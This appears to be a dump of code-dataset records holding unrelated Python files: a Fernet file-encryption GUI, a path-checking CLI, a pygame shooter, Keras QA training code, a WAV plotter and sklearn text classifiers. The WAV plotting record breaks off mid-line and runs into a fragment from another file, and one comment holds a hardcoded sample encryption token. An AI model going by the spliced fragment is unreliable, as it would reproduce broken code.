"code-starcoder2", "pt": "74", "api": [{"api_name": "bpy.types.UIList", "line_number": 36, "usage_type": "name"}, {"api_name": "bpy.types.Panel", "line_number": 59, "usage_type": "name"}, {"api_name": "bpy.types.Panel", "line_number": 75, "usage_type": "name"}, {"api_name": "bpy.types.Panel", "line_number": 159, "usage_type": "name"}, {"api_name": "bpy.types.Panel", "line_number": 193, "usage_type": "name"}, {"api_name": "bpy.types.Panel", "line_number": 230, "usage_type": "name"}, {"api_name": "bpy.types.Panel", "line_number": 293, "usage_type": "name"}, {"api_name": "bpy.types.Panel", "line_number": 332, "usage_type": "name"}, {"api_name": "bpy.types.Panel", "line_number": 351, "usage_type": "name"}, {"api_name": "bpy.types.Panel", "line_number": 379, "usage_type": "name"}, {"api_name": "bpy.types.Panel", "line_number": 418, "usage_type": "name"}, {"api_name": "properties_physics_common.point_cache_ui", "line_number": 433, "usage_type": "call"}, {"api_name": "bpy.types.Panel", "line_number": 436, "usage_type": "name"}, {"api_name": "properties_physics_common.effector_weights_ui", "line_number": 451, "usage_type": "call"}, {"api_name": "rna_prop_ui.PropertyPanel", "line_number": 454, "usage_type": "name"}, {"api_name": "bpy.types.Panel", "line_number": 454, "usage_type": "name"}, {"api_name": "bpy.types", "line_number": 457, "usage_type": "attribute"}, {"api_name": "bpy.utils.register_class", "line_number": 479, "usage_type": "call"}]}
+{"seq_id": "32795658", "text": "from cryptography.fernet import Fernet as fernet\nfrom tkinter import *\nfrom encryption import *\nfrom tkinter import filedialog\ndef decryptFromUserInput():\n userInputToken = entry2.get()\n userInputFile = entry1.get()\n try:\n decdet=getDecryptionDetails(userInputFile)\n decrypted = decryptFile(userInputToken,decdet['encryptedContents'])\n messagebox.showinfo('Success!',decrypted)\n text1.insert(END,decrypted)\n except:\n messagebox.showinfo('error','Unable to decrypt file')\ndef decryptFromUserInputToFile():\n userInputToken = entry2.get()\n userInputFile = entry1.get()\n try:\n decdet = getDecryptionDetails(userInputFile)\n decrypted = decryptFile(userInputToken,decdet['encryptedContents'])\n with open(userInputFile,'w') as f:\n f.write(decrypted)\n messagebox.showinfo('Success!','File Decrypted')\n text1.delete(1.0,END)\n text1.insert(END, decrypted)\n except:\n messagebox.showinfo('Error!','Unable to decrypt file')\ndef encryptFileFromUserInput():\n userInputFile = entry1.get()\n userInputKey = entry2.get()\n if userInputKey != '':\n try:\n message = encryptFileWithKey(userInputFile,userInputKey)\n print(message)\n print('Encrypted file:'+userInputFile)\n print('With key:'+ userInputKey)\n except:\n messagebox.showinfo('Error','Error encrypting with key provided')\n else:\n try:\n key = encryptFileAndReturnKey(userInputFile)\n messagebox.showinfo('Success','File encrypted')\n messagebox.showinfo('token','Token:'+key)\n text1.insert(END,key)\n except:\n messagebox.showinfo('Error','Unable to encrypt file')\ndef chooseFile():\n top.filename = filedialog.askopenfilename(initialdir='/',title=\"Select file\")\n entry1.insert(END,top.filename)\n\ndef generateKey():\n key = fernet.generate_key()\n key = key.decode()\n text1.delete(1.0,END)\n #text1.insert(END,'Key:'+key)\n text1.insert(END,key)\n return 0\n\ntop = Tk()\nlabel1 = Label(top, text='File to decrypt/encrypt')\nlabel2 = Label(top,text='encryptiontoken')\nentry1 = Entry(top)\nentry2 = Entry(top)\nbutton1 = Button(top,text='Decrypt',command=decryptFromUserInputToFile)\nbutton2 = Button(top,text='Encrypt',command=encryptFileFromUserInput)\nbutton3 = Button(top,text='Generate token',command=generateKey)\ntext1 = Text(top, height=9,width=40)\nfile = Button(top, text='Choose file',command=chooseFile)\n\nlabel1.grid(row=0)\nlabel2.grid(row=1)\nentry1.grid(row=0,column=1)\nentry2.grid(row=1,column=1)\nbutton1.grid(row=2,column=0)\nbutton2.grid(row=2,column=1)\nfile.grid(row=2,column=2)\nbutton3.grid(row=2,column=3)\ntext1.grid(row=3,column=0,columnspan=5)\n\ntop.mainloop()\n\n#IMPORTANT\n#encryptFile('testsubject.txt')\n#decryptionDetails = getDecryptionDetails('testsubject.txt')\n#decrypted = decryptFile(decryptionDetails['encryptionToken'],decryptionDetails['encryptedContents'])\n#print('File decrypted: '+ decrypted)\n\n#save\n#encryptedContentsAsHex = '67414141414142646c3777466636596e4967615f736c4f5043674943634f4a6373674a6332374f7630335948394a5a4b624654465966744e5755434b5364674558324a5056666f5236527763435f38334d453053305157525a47382d724279656a413d3d'\n#encryptionToken = '6CIKhvDqFMA2PL-7PwSTx5tBwBMLYC1FlXp4kJHJr-s='\n#decryptFile(encryptionToken,encryptedContentsAsHex)\n\n\n\ndef example():\n key = fernet.generate_key()\n f = fernet(key)\n token = f.encrypt(str.encode('secret'))\n print('token: ' + bytes(token).hex())\n decrypted = f.decrypt(token)\n print('Decrypted: ' + decrypted.decode('utf-8'))\n\n\n", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 3629, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "tkinter.filedialog.askopenfilename", "line_number": 48, "usage_type": "call"}, {"api_name": "tkinter.filedialog", "line_number": 48, "usage_type": "name"}, {"api_name": "cryptography.fernet.Fernet.generate_key", "line_number": 52, "usage_type": "call"}, {"api_name": "cryptography.fernet.Fernet", "line_number": 52, "usage_type": "name"}, {"api_name": "cryptography.fernet.Fernet.generate_key", "line_number": 96, "usage_type": "call"}, {"api_name": "cryptography.fernet.Fernet", "line_number": 96, "usage_type": "name"}, {"api_name": "cryptography.fernet.Fernet", "line_number": 97, "usage_type": "call"}]}
+{"seq_id": "583451054", "text": "#!/usr/bin/python\n# coding: utf-8\n\nimport argparse\nimport os\nimport sys\nsys.path.insert(0, os.path.abspath('../..'))\n\nfrom ps_path import lib\n\n\ndef main():\n parser = argparse.ArgumentParser(\n description='指定されたパスが実在するか否かを真偽値で返します。')\n parser.add_argument(\n 'path',\n help='存在を確認したいパス')\n parser.add_argument(\n '--path-type',\n choices=['leaf', 'container', 'any'],\n default='any',\n help=\"\"\"leaf: パスが実在し、かつファイル��あれば True を返します。 |\n container: パスが実在し、\n かつディレクトリであれば True を返します。 |\n any: パスが実在すれば True を返します。\n ファイルであるか、\n ディレクトリであるかは問いません。\"\"\")\n\n args = parser.parse_args()\n\n result = lib.test_path(args.path, args.path_type)\n print(result)\n\nif __name__ == '__main__':\n main()\n", "sub_path": "ps_path/bin/test_path.py", "file_name": "test_path.py", "file_ext": "py", "file_size_in_byte": 1056, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "sys.path.insert", "line_number": 7, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 13, "usage_type": "call"}, {"api_name": "ps_path.lib.test_path", "line_number": 31, "usage_type": "call"}, {"api_name": "ps_path.lib", "line_number": 31, "usage_type": "name"}]}
+{"seq_id": "536163694", "text": "### Import Libraries\r\nimport sys, pygame\r\nfrom time import sleep\r\n\r\n#### Import Modules\r\nfrom bullet import Bullet\r\nfrom alien import Alien\r\n\r\n### Functions -> Main game Functions\r\n\r\ndef check_events(ai_set, screen, stats, sb, play_button, ship, aliens, bullets):\r\n '''Looks for, and respond to, input events'''\r\n for event in pygame.event.get():\r\n #Exit conditions\r\n if event.type == pygame.QUIT:\r\n sys.exit()\r\n elif event.type == pygame.MOUSEBUTTONDOWN:\r\n mouse_x, mouse_y = pygame.mouse.get_pos()\r\n check_play_button(ai_set, screen, stats, sb, play_button, ship, aliens, bullets, mouse_x, mouse_y)\r\n #KEYDOWN and KEYUP events\r\n elif event.type == pygame.KEYDOWN:\r\n check_keydown_events(event, ai_set, screen, ship, bullets)\r\n elif event.type == pygame.KEYUP:\r\n check_keyup_events(event, ship)\r\n\r\ndef check_play_button (ai_set, screen, stats, sb, play_button, ship, aliens, bullets, mouse_x, mouse_y):\r\n '''Starts a new game when play button is clicked'''\r\n button_clicked = play_button.rect.collidepoint(mouse_x, mouse_y)\r\n if button_clicked and not stats.game_active:\r\n #Reset game settings\r\n ai_set.initialize_dynamic_settings()\r\n #Reset the scoreboard\r\n sb.prep_score()\r\n sb.prep_level()\r\n sb.prep_high_score()\r\n sb.prep_ships()\r\n #pygame.mouse.set_visable(False)\r\n stats.reset_stats()\r\n stats.game_active = True\r\n #Reset aliens, bullets and fleet\r\n aliens.empty()\r\n bullets.empty()\r\n create_fleet(ai_set,screen,ship, aliens)\r\n ship.center_ship()\r\n\r\n\r\ndef check_keydown_events (event, ai_set, screen, ship, bullets):\r\n '''Responds to KEYDOWN events'''\r\n #Sets movement flags on arrow keys\r\n if event.key == pygame.K_RIGHT:\r\n ship.moving_right = True\r\n elif event.key == pygame.K_LEFT:\r\n ship.moving_left = True\r\n #Creates new bullet object on space key\r\n elif event.key == pygame.K_SPACE:\r\n fire_bullet(ai_set, screen, ship, bullets)\r\n #Exit on Q\r\n elif event.key == pygame.K_q:\r\n sys.exit()\r\n\r\ndef check_keyup_events (event, ship):\r\n '''Responds to KEYUP events'''\r\n if event.key == pygame.K_RIGHT:\r\n ship.moving_right = False\r\n elif event.key == pygame.K_LEFT:\r\n ship.moving_left = False\r\n\r\ndef update_screen(ai_set, screen, stats, sb, ship, aliens, bullets, play_button):\r\n '''Upate and redraw screen'''\r\n #Screen redraw for each pass\r\n screen.fill(ai_set.bg_color)\r\n for bullet in bullets.sprites():\r\n bullet.draw_bullet()\r\n ship.blitme()\r\n aliens.draw(screen)\r\n sb.show_score()\r\n #Draw play button only when screen is inactive\r\n if not stats.game_active:\r\n play_button.draw_button()\r\n #Make most recent screen visable\r\n pygame.display.flip()\r\n\r\ndef update_bullets (ai_set, screen, stats, sb, ship ,aliens, bullets):\r\n '''Update position of bullets and get rid of old bullets'''\r\n #Bullet positon update\r\n bullets.update()\r\n #Remove bullets out of screen\r\n for bullet in bullets.copy():\r\n if bullet.rect.bottom <= 0:\r\n bullets.remove(bullet)\r\n #Collision check\r\n check_alien_bullet_collisions(ai_set, screen, stats, sb, ship, aliens, bullets)\r\n\r\ndef check_alien_bullet_collisions (ai_set, screen, stats, sb, ship, aliens, bullets):\r\n '''Checks for and responds to collisons between bullets and aliens'''\r\n #Collision check, and removal of alien and bullet, and speed up game\r\n collisions = pygame.sprite.groupcollide(bullets, aliens, True, True)\r\n if collisions:\r\n for aliens in collisions.values():\r\n stats.score += ai_set.alien_points * len(aliens)\r\n sb.prep_score()\r\n check_high_score(stats, sb)\r\n if len(aliens) == 0:\r\n #Reset bullets and alien fleet\r\n bullets.empty()\r\n ai_set.increase_speed()\r\n create_fleet(ai_set, screen, ship, aliens)\r\n #Increase level\r\n stats.level += 1\r\n sb.prep_level()\r\n\r\ndef fire_bullet (ai_set, screen, ship, bullets):\r\n '''Fire a bullet if under limit'''\r\n if len(bullets) < ai_set.bullets_allowed:\r\n new_bullet = Bullet(ai_set, screen, ship)\r\n bullets.add(new_bullet)\r\n\r\ndef create_fleet (ai_set, screen, ship, aliens):\r\n '''Creates a fleet of aliens'''\r\n #Create an alien and find number that fit in a row\r\n alien = Alien(ai_set, screen)\r\n number_aliens_x = get_number_aliens_x(ai_set, alien.rect.width)\r\n number_rows = get_number_rows (ai_set, ship.rect.height, alien.rect.height)\r\n\r\n #Create a row of aliens\r\n for row_number in range(number_rows):\r\n for alien_number in range(number_aliens_x):\r\n create_alien(ai_set, screen, aliens, alien_number, row_number)\r\n\r\ndef get_number_aliens_x (ai_set, alien_width):\r\n '''Calculate number of aliens per fleet'''\r\n avalible_space_x = ai_set.screen_width - 2 * alien_width\r\n number_aliens_x = int(avalible_space_x / (2 * alien_width))\r\n return number_aliens_x\r\n\r\ndef create_alien (ai_set, screen, aliens, alien_number, row_number):\r\n '''Create aliens and place them in a fleet'''\r\n alien = Alien(ai_set, screen)\r\n alien_width = alien.rect.width\r\n alien.x = alien_width + 2 * alien_width * alien_number\r\n alien.rect.x = alien.x\r\n alien.rect.y = alien.rect.height + 2 * alien.rect.height * row_number\r\n aliens.add(alien)\r\n\r\ndef get_number_rows (ai_set, ship_height, alien_height):\r\n '''Calcuate the numer of rows of aliens that fit the screen'''\r\n avalible_space_y = (ai_set.screen_height - (3 * alien_height) - ship_height)\r\n number_rows = int(avalible_space_y / (2 * alien_height))\r\n return number_rows\r\n\r\ndef update_aliens (ai_set, screen, stats, sb, ship, aliens, bullets):\r\n '''Update position of aleins in group'''\r\n check_fleet_edge(ai_set, aliens)\r\n aliens.update()\r\n #Check for collison between aliens and ship\r\n if pygame.sprite.spritecollideany(ship, aliens):\r\n ship_hit(ai_set, stats, screen, sb, ship, aliens, bullets)\r\n #Check for aliens hitting the bottom of the screen\r\n check_aliens_bottom(ai_set, screen, stats, sb, ship, aliens, bullets)\r\n\r\ndef check_aliens_bottom (ai_set, screen, stats, sb, ship, aliens, bullets):\r\n ''''Check if any aliens have hit the bottom of the screen'''\r\n screen_rect = screen.get_rect()\r\n for alien in aliens.sprites():\r\n if alien.rect.bottom >= screen_rect.bottom:\r\n #same outcome as if ship was hit\r\n ship_hit(ai_set, stats, screen, sb, ship, aliens, bullets)\r\n break\r\n\r\ndef ship_hit (ai_set, stats, screen, sb, ship, aliens, bullets):\r\n '''respond to ship being hit by aliens.'''\r\n if stats.ships_left > 0:\r\n #deduct a ship and reset bullets, aliens and ship positon\r\n stats.ships_left -= 1\r\n sb.prep_ships()\r\n aliens.empty()\r\n bullets.empty\r\n create_fleet(ai_set, screen, ship, aliens)\r\n ship.center_ship()\r\n sleep(0.5)\r\n else:\r\n stats.game_active = False\r\n #pygame.mouse.set_visable(True)\r\n\r\ndef check_fleet_edge (ai_set, aliens):\r\n '''checks and responds to alien hitting the side'''\r\n for alien in aliens.sprites():\r\n if alien.check_edge():\r\n change_fleet_direction(ai_set,aliens)\r\n break\r\ndef change_fleet_direction (ai_set,aliens):\r\n '''Change direction and height'''\r\n for alien in aliens.sprites():\r\n alien.rect.y += ai_set.fleet_drop_speed\r\n ai_set.fleet_direction *= -1\r\n\r\ndef check_high_score (stats, sb):\r\n '''Checks for new high score.'''\r\n if stats.score > stats.high_score:\r\n stats.high_score = stats.score\r\n sb.prep_high_score()\r\n\r\n", "sub_path": "game_functions.py", "file_name": "game_functions.py", "file_ext": "py", "file_size_in_byte": 7791, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "pygame.event.get", "line_number": 13, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 13, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 15, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 16, "usage_type": "call"}, {"api_name": "pygame.MOUSEBUTTONDOWN", "line_number": 17, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pos", "line_number": 18, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 18, "usage_type": "attribute"}, {"api_name": "pygame.KEYDOWN", "line_number": 21, "usage_type": "attribute"}, {"api_name": "pygame.KEYUP", "line_number": 23, "usage_type": "attribute"}, {"api_name": "pygame.K_RIGHT", "line_number": 50, "usage_type": "attribute"}, {"api_name": "pygame.K_LEFT", "line_number": 52, "usage_type": "attribute"}, {"api_name": "pygame.K_SPACE", "line_number": 55, "usage_type": "attribute"}, {"api_name": "pygame.K_q", "line_number": 58, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 59, "usage_type": "call"}, {"api_name": "pygame.K_RIGHT", "line_number": 63, "usage_type": "attribute"}, {"api_name": "pygame.K_LEFT", "line_number": 65, "usage_type": "attribute"}, {"api_name": "bullet.draw_bullet", "line_number": 73, "usage_type": "call"}, {"api_name": "pygame.display.flip", "line_number": 81, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 81, "usage_type": "attribute"}, {"api_name": "bullet.rect", "line_number": 89, "usage_type": "attribute"}, {"api_name": "pygame.sprite.groupcollide", "line_number": 97, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 97, "usage_type": "attribute"}, {"api_name": "bullet.Bullet", "line_number": 115, "usage_type": "call"}, {"api_name": "alien.Alien", "line_number": 121, "usage_type": "call"}, {"api_name": "alien.rect", "line_number": 122, "usage_type": "attribute"}, {"api_name": "alien.rect", "line_number": 123, "usage_type": "attribute"}, {"api_name": "alien.Alien", "line_number": 138, "usage_type": "call"}, {"api_name": "alien.rect", "line_number": 139, "usage_type": "attribute"}, {"api_name": "alien.x", "line_number": 140, "usage_type": "attribute"}, {"api_name": "alien.rect", "line_number": 141, "usage_type": "attribute"}, {"api_name": "alien.x", "line_number": 141, "usage_type": "attribute"}, {"api_name": "alien.rect", "line_number": 142, "usage_type": "attribute"}, {"api_name": "pygame.sprite.spritecollideany", "line_number": 156, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 156, "usage_type": "attribute"}, {"api_name": "alien.rect", "line_number": 165, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 180, "usage_type": "call"}, {"api_name": "alien.check_edge", "line_number": 188, "usage_type": "call"}, {"api_name": "alien.rect", "line_number": 194, "usage_type": "attribute"}]}
+{"seq_id": "490828457", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Dec 18 09:30:32 2018\n\n@author: liyuan\n\"\"\"\nimport keras\nimport numpy as np\nfrom Struct import Struct\nfrom loss_functions import _loss_tensor\n\ndef adapt_embeddings(self,lr = 0.001, num_iter = 5,fits_per_iteration = 1,batch_size = 16, embeddings_verbose_flag = 1):\n training_model = self.training_model\n explain_intseq = self.data.exp_intseq\n questions_intseq = self.data.questions_intseq\n answers_intseq = self.data.answers_intseq\n [train_indices, val_indices, test_indices] = self.data.indices\n\n dummy_labels_train = self.data.dummy_labels_train\n dummy_labels_val = self.data.dummy_labels_val\n answers_intseq2_val = self.data.answers_intseq2_val \n \n training_model.get_layer('glove_embedding').trainable = True\n training_model.compile(optimizer = keras.optimizers.Adam(lr),loss = _loss_tensor,metrics = [])\n \n history_cache = dict()\n \n for i in range(num_iter):\n answers_intseq2 = self.data.sample_wrong_answers()\n X_train = [explain_intseq[train_indices],\n questions_intseq[train_indices],\n answers_intseq[train_indices],\n answers_intseq2[train_indices]]\n X_val = [explain_intseq[val_indices],\n questions_intseq[val_indices],\n answers_intseq[val_indices],\n answers_intseq2_val[val_indices]]\n history = training_model.fit(x = X_train,\n y = dummy_labels_train,\n validation_data = [X_val,dummy_labels_val],\n batch_size = batch_size,\n epochs = fits_per_iteration,\n verbose = embeddings_verbose_flag)\n history_cache[i] = history.history\n self.val_loss = np.append(self.val_loss,history.history['val_loss'])\n self.training_loss = np.append(self.training_loss,history.history['loss'])\n \n training_model.get_layer('glove_embedding').trainable = False\n training_model.compile(optimizer = keras.optimizers.Adam(lr),loss = _loss_tensor,metrics = [])\n \n self.training_model = training_model\n self.history_cache = history_cache\n \n\ndef run_many_times(self,num_runs = 5,num_iter = 20, learning_rate = 0.001, decay = 0, batch_size = 128, fits_per_iteration = 5,save_plot = 0, verbose = False, embeddings_verbose_flag = False, adapt_embeddings = False, adapt_iteration = 5):\n training_model = self.training_model\n explain_intseq = self.data.exp_intseq\n questions_intseq = self.data.questions_intseq\n answers_intseq = self.data.answers_intseq\n [train_indices, val_indices, test_indices] = self.data.indices\n\n dummy_labels_train = self.data.dummy_labels_train\n dummy_labels_val = self.data.dummy_labels_val\n answers_intseq2_val = self.data.answers_intseq2_val\n \n OPTIMIZER = keras.optimizers.Adam(lr = learning_rate,decay = decay)\n\n for i in range(num_runs):\n print('running run no. {} of {} runs...'.format(i+1,num_runs)) \n self.reset_weights()\n self.reset_losses()\n \n if adapt_embeddings is True:\n self.adapt_embeddings(num_iter = adapt_iteration,\n embeddings_verbose_flag = embeddings_verbose_flag)\n \n self.train(num_iter = num_iter,\n learning_rate = learning_rate,\n decay = decay,\n batch_size = batch_size,\n fits_per_iteration = fits_per_iteration,\n verbose = verbose,\n save_plot = save_plot)\n min_loss = np.min(self.val_loss)\n self.predict()\n \n save_all_models = 1\n if min_loss < 0.9 or save_all_models == 1:\n self.save_model()\n save_plot = 0\n self.plot_losses(save_plot = 0)\n \n self.plot_losses_many_runs(save_plot = 0)\n \n \n \ndef predict(self, subset = 1, verbose = 1):\n def softmax(predicted_output):\n a = np.exp(predicted_output)\n b = np.sum(a,1).reshape(-1,1)\n return a/b\n prediction_model = self.prediction_model\n all_answer_options_intseq = self.data.cache.all_answer_options_intseq\n explain_intseq = self.data.exp_intseq\n questions_intseq = self.data.questions_intseq\n answers = self.data.cache.answers\n indices = self.data.indices\n int_ans = np.array([self.data.convert_to_int(letter) for letter,ans in answers])\n \n \n if subset == 1:\n train_indices,val_indices,test_indices = self.data.indices \n train_indices = train_indices[0:150]\n val_indices = val_indices[0:150]\n test_indices = test_indices[0:150]\n indices = [train_indices,val_indices,test_indices]\n \n prediction_model.compile(optimizer = 'adam', loss = _loss_tensor, metrics = [keras.metrics.categorical_accuracy])\n all_answer_options_intseq = np.array(all_answer_options_intseq)\n acc = []\n \n for i in range(3):\n ind = indices[i]\n input1 = explain_intseq[ind]\n input2 = questions_intseq[ind]\n input3 = all_answer_options_intseq[:,0,:][ind]\n input4 = all_answer_options_intseq[:,1,:][ind]\n input5 = all_answer_options_intseq[:,2,:][ind]\n input6 = all_answer_options_intseq[:,3,:][ind]\n predicted_output = prediction_model.predict([input1,input2,input3,input4,input5,input6],\n batch_size = 64,\n verbose = verbose)\n predicted_output_softmax = softmax(predicted_output)\n predicted_ans = np.argmax(predicted_output,axis = 1)\n accuracy = np.mean(predicted_ans == int_ans[ind])\n acc.append(accuracy)\n\n print('train,val,test accuracies: {:.2f}/{:.2f}/{:.2f}'.format(acc[0],acc[1],acc[2]))\n \n \n cache = Struct()\n cache.predicted_output = predicted_output\n cache.predicted_output_softmax = predicted_output_softmax\n cache.predicted_ans = predicted_ans\n cache.int_ans = int_ans\n self.predictions_cache = cache\n self.acc = acc \n return cache ", "sub_path": "_deepqa_main.py", "file_name": "_deepqa_main.py", "file_ext": "py", "file_size_in_byte": 6213, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "keras.optimizers.Adam", "line_number": 25, "usage_type": "call"}, {"api_name": "keras.optimizers", "line_number": 25, "usage_type": "attribute"}, {"api_name": "loss_functions._loss_tensor", "line_number": 25, "usage_type": "name"}, {"api_name": "numpy.append", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 47, "usage_type": "call"}, {"api_name": "keras.optimizers.Adam", "line_number": 50, "usage_type": "call"}, {"api_name": "keras.optimizers", "line_number": 50, "usage_type": "attribute"}, {"api_name": "loss_functions._loss_tensor", "line_number": 50, "usage_type": "name"}, {"api_name": "keras.optimizers.Adam", "line_number": 67, "usage_type": "call"}, {"api_name": "keras.optimizers", "line_number": 67, "usage_type": "attribute"}, {"api_name": "numpy.min", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 101, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 109, "usage_type": "call"}, {"api_name": "loss_functions._loss_tensor", "line_number": 119, "usage_type": "name"}, {"api_name": "keras.metrics", "line_number": 119, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 136, "usage_type": "call"}, {"api_name": "Struct.Struct", "line_number": 142, "usage_type": "call"}]}
+{"seq_id": "72602257", "text": "#from pylab import*\r\nimport matplotlib.pyplot as plt\r\nfrom scipy.io import wavfile\r\nimport numpy as np\r\nimport wave\r\n\r\ndef plot_wave(file,color,linewidth):\r\n\twith wave.open(file,'r') as wav_file:\r\n\t\tfs = wav_file.getframerate() #44100hz\r\n\t\tfr = wav_file.getnframes()\r\n\t\t\r\n\t\t\r\n\t\tsignal = wav_file.readframes(-1)\r\n\t\tsignal = np.frombuffer(signal, 'int16')\r\n\t\t\t\t\r\n\t\ts2 = signal[::2] #every other element, in this case, 1 channel of sterio\r\n\t\t#s3 = signal[1::2] #get the other channel\r\n\t\t#s2 = s2/(2.**15) #adjust the data to float (-1 (1000 * 1000 * 1000 * 1000):\n # size = offload / (1000 * 1000 * 1000 * 1000)\n # size_value = \"TB\"\n # elif offload > (1000 * 1000 * 1000):\n # size = offload / (1000 * 1000 * 1000)\n # size_value = \"GB\"\n # elif offload > (1000 * 1000):\n # size = offload / (1000 * 1000)\n # size_value = \"MB\"\n # elif offload > (1000):\n # size = offload / (1000)\n # size_value = \"KB\"\n # else:\n # size = offload\n # size_value = \"Bytes\"\n\n # return size, size_value\n\n\n", "sub_path": "tests/common/util.py", "file_name": "util.py", "file_ext": "py", "file_size_in_byte": 1176, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "tempfile.mkstemp", "line_number": 9, "usage_type": "call"}, {"api_name": "os.close", "line_number": 10, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 13, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 21, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 21, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 28, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 28, "usage_type": "call"}, {"api_name": "hurry.filesize.size", "line_number": 33, "usage_type": "call"}]}
+{"seq_id": "492688425", "text": "import os\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfTransformer\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.externals import joblib\nimport numpy as np\nimport pdb\nimport os\nfrom sklearn.svm import SVC\n\n# #authorship...\nfile = os.path.join(os.getcwd(), os.listdir(os.getcwd())[0])\ndir = os.path.dirname(file) + '/data/predefined_tasks'\nauthorship_test = open(os.path.join(dir, 'authorship/authorship_test.txt'))\nauthorship_train = open(os.path.join(dir, 'authorship/authorship_train.txt'))\nauthorship_path_pkl = os.path.join(dir, 'authorship/')\nauthorship_file_pkl = open(os.path.join(authorship_path_pkl,'authorship.pkl'),'a')\n\n#train data...\nauthorship_train_lines = authorship_train.readlines()\nauthorship_train_labels = []\nauthorship_train_texts = []\npdb.set_trace()\nfor line in authorship_train_lines:\n\tline = line.split(' ')\n\tlabel = line[0]\n\ttext = ' '.join(line[1:line.__len__()-1])\n\tauthorship_train_labels.append(label)\n\tauthorship_train_texts.append(text)\n#test data....\nauthorship_test_lines = authorship_test.readlines()\nauthorship_test_labels = []\nauthorship_test_texts = []\n\nfor line in authorship_test_lines:\n\tline = line.split(' ')\n\tlabel = line[0]\n\ttext = ' '.join(line[1:line.__len__()-1])\n\tauthorship_test_labels.append(label)\n\tauthorship_test_texts.append(text)\n\npdb.set_trace()\nclf_authorship = Pipeline([ ('vect', CountVectorizer(analyzer='char', ngram_range=(3,5))),\n\t\t('tfidf', TfidfTransformer()),\n\t\t('clf', SVC(C=0.001)),\n\t])\nclf_authorship = clf_authorship.fit(authorship_train_texts, authorship_train_labels)\n\nprediction = clf_authorship.score(authorship_test_texts, authorship_test_labels)\njoblib.dump(clf_authorship, os.path.join(authorship_path_pkl,'authorship.pkl'))\nauthorship_file_pkl.close()\n\n\n#sentiment...\nsentiment_test = open(os.path.join(dir, 'twitter_sentiment/sentiment_test.txt'))\nsentiment_train = open(os.path.join(dir, 'twitter_sentiment/sentiment_train.txt'))\nsentiment_path_pkl = os.path.join(dir, 'twitter_sentiment/')\nsentiment_file_pkl = open(os.path.join(sentiment_path_pkl,'sentiment.pkl'),'a')\n\n#train data...\nsentiment_train_lines = sentiment_train.readlines()\nsentiment_train_labels = []\nsentiment_train_texts = []\npdb.set_trace()\nfor line in sentiment_train_lines:\n\tline = line.split(' ')\n\tlabel = line[0]\n\ttext = ' '.join(line[1:line.__len__()-1])\n\tsentiment_train_labels.append(label)\n\tsentiment_train_texts.append(text)\n#test data....\nsentiment_test_lines = sentiment_test.readlines()\nsentiment_test_labels = []\nsentiment_test_texts = []\n\nfor line in sentiment_test_lines:\n\tline = line.split(' ')\n\tlabel = line[0]\n\ttext = ' '.join(line[1:line.__len__()-1])\n\tsentiment_test_labels.append(label)\n\tsentiment_test_texts.append(text)\n\npdb.set_trace()\nclf_sentiment = Pipeline([ ('vect', CountVectorizer(analyzer='char', ngram_range=(1,7))),\n\t\t#('tfidf', TfidfTransformer()),\n\t\t('clf', SVC(C=10.0)),\n\t])\nclf_sentiment = clf_sentiment.fit(sentiment_train_texts, sentiment_train_labels)\n\nprediction = clf_sentiment.score(sentiment_test_texts, sentiment_test_labels)\njoblib.dump(clf_sentiment, os.path.join(sentiment_path_pkl,'sentiment.pkl'))\nsentiment_file_pkl.close()\n\nauthorship_test.close()\nauthorship_train.close()\nsentiment_test.close()\nsentiment_train.close()\n", "sub_path": "initialize_authorship_sentiment.py", "file_name": "initialize_authorship_sentiment.py", "file_ext": "py", "file_size_in_byte": 3292, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "os.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 12, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": 